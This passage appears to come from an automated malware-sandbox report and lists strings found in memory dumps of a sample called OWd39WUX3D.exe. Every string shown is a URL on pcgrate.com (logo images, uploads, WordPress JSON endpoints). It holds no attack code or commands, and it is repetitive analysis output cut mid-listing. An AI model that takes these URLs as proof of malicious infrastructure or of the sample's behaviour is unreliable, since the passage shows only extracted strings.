00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/1920px-Raytheon.svg_-1-e1626285787717.png
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/Huawei-Logowine-1.png
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/Newport-logo-76F09AD2F3-seeklogo.com_-e1626287837846.png
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/about-150x150.jpg
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/about-200x200.jpg
              Source: OWd39WUX3D.exe, 00000000.00000003.423323180.0000000003C10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/about-300x298.jpg
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/about.jpg
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/bae_systems-1.png
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/horiba_1.png
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-content/uploads/logo_01-1.png
              Source: OWd39WUX3D.exe, 00000000.00000003.590153485.0000000006B65000.00000004.00000020.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613011960.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.389334492.0000000007C30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390649604.00000000037A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610918600.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-json/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.pcgrate.com%2F
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.608254819.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610092918.0000000002D60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492299587.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.pcgrate.com%2F&format=xm
              Source: OWd39WUX3D.exe, 00000000.00000003.590153485.0000000006B65000.00000004.00000020.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496225070.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.493585779.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.496974996.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613011960.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.500705598.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.389334492.0000000007C30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498788953.0000000003030000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390649604.00000000037A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.398606523.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.610918600.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-json/wp/v2/pages/1009
